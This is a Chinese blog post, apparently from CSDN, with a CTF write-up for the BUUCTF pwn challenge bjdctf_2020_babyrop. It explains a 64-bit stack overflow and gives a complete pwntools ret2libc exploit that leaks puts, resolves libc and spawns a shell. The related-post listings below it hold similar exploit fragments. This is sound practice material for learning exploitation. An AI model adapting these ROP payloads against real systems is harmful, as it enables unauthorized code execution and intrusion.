pwn刷题num40----ret2libc

已于 2022-05-02 17:43:01 修改
阅读量317 收藏
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: linux 安全 网络安全 python c语言
于 2022-05-02 17:42:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124543309
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-bjdctf_2020_babyrop

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida一下看一下伪代码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

思路

read函数明显的栈溢出,read函数输入0x64字节,而buf只有0x20字节,找一下发现函数没有后门函数,但是有puts函数,可以用其泄露函数真实地址,从而获得libc版本,获得system函数地址,字符串/bin/sh地址
exp

from pwn import * 
from LibcSearcher import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh = remote('node4.buuoj.cn',26737)
elf = ELF('./bjdctf_2020_babyrop')
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
main_addr = elf.symbols['main']
pop_rdi_ret_addr = 0x400733	#64传参第一个参数用寄存器rdi传递
payload = flat(['a' * 0x28,pop_rdi_ret_addr,puts_got_addr,puts_plt_addr,main_addr])
sh.recvuntil('story!')
sh.sendline(payload)
sh.recv()		
puts_addr = u64(sh.recvline()[:-1].ljust(8,b'\x00'))	#获得函数真实地址
print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr) #获得libc版本
libcbase = puts_addr - libc.dump('puts')
system_addr = libc.dump('system') + libcbase
bin_sh_addr = libc.dump('str_bin_sh') + libcbase
payload = flat(['a' * 0x28,pop_rdi_ret_addr,bin_sh_addr,system_addr])
sh.recvuntil('story!')
sh.sendline(payload)
sh.interactive()

运行获得shell
在这里插入图片描述

在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-ret2libc基础
admin的博客
10-04 800
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
pwn学习之ret2libc
weixin_43800829的博客
02-16 1219
title: pwn学习之ret2libc date: 2020-01-29 18:07:07 tags: pwn学习 在家无聊了的第二天,继续学习pwn的知识 ​ 今天看了看wiki-ret2libc的内容,觉得受益匪浅。 原理 ​ ret2libc说白了就是让我们之前的ret不往shellcode或者vul上跳 而是跳到了某个函数的plt或者got的位置 从而实现控制程序的函数去执行li...
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 305
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 654
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
BUUCTF ciscn_2019_c_1(64位ret2libc3)
Rt1Text的博客
04-10 4479
1.checksec+运行 64位/NX保护 运行起来貌似很有意思,是一个加解密操作 后来发现只能加密不能解密 2. 强大的IDA进行中 1.main函数 貌似看不出什么 2.encrypt函数 加密具体操作 大小写字母/数字进行异或运算 发现gets()栈溢出 s大小0x50 需要先把加密函数绕过 该函数的功能就是循环对输入的字符串进行加密,在加密前都有一个检查,只要v0的值大于或等于字符串的长度就跳出循环,通过strlen来计算字符串长度的,strlen计算字.
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
libc-database:建立libc偏移量数据库以简化开发
04-01
libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
BUUCTF的第二题rip&一道ret2libc
最新发布
I_ET5u5的博客
12-11 228
buuctf的第二题和一道ret2libc的小难点
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 397
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
BUUCTF--pwn--[OGeek2019]babyrop【ret2libc
qq_73149934的博客
12-06 221
BUUCTF--pwn--[OGeek2019]babyrop
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 234
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 367
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF--pwn--jarvisoj_level3【ret2libc
qq_73149934的博客
12-04 275
BUUCTF--pwn--jarvisoj_level3
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 250
BUUCTF--pwn--ciscn_2019_c_1
栈溢出之Return2libc
Yannie's Blog
12-09 1037
参考文章:https://zhuanlan.zhihu.com/p/25816426 我们利用函数调用来实现攻击,核心目的是用攻击指令的地址来覆盖返回地址 通常用的有以下四种方法: 修改返回地址,让其指向溢出数据中的一段指令(shellcode) 修改返回地址,让其指向内存中已有的某个函数(return2libc) 修改返回地址,让其指向内存中已有的一段指令(ROP) 修改某个被调用函数的地址,让...
ret2libc(可绕NX但不可绕PIE和ASLR,因为PIE会使ELF本身随机化,ASLR会使libc.so基址随机化)
EternalBurning的博客
11-12 399
ret2libc能直接找到system和/bin/shchecksec泄漏点偏移libc调用exp找不到/bin/shchecksec检查漏洞函数确认偏移查找是否有系统调用字符串 能直接找到system和/bin/sh checksec 泄漏点 偏移 108+4=112 libc调用 程序中有外部引入system()函数 所以我们接下来找/bin/sh就可以了 exp 找不到/bin...
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值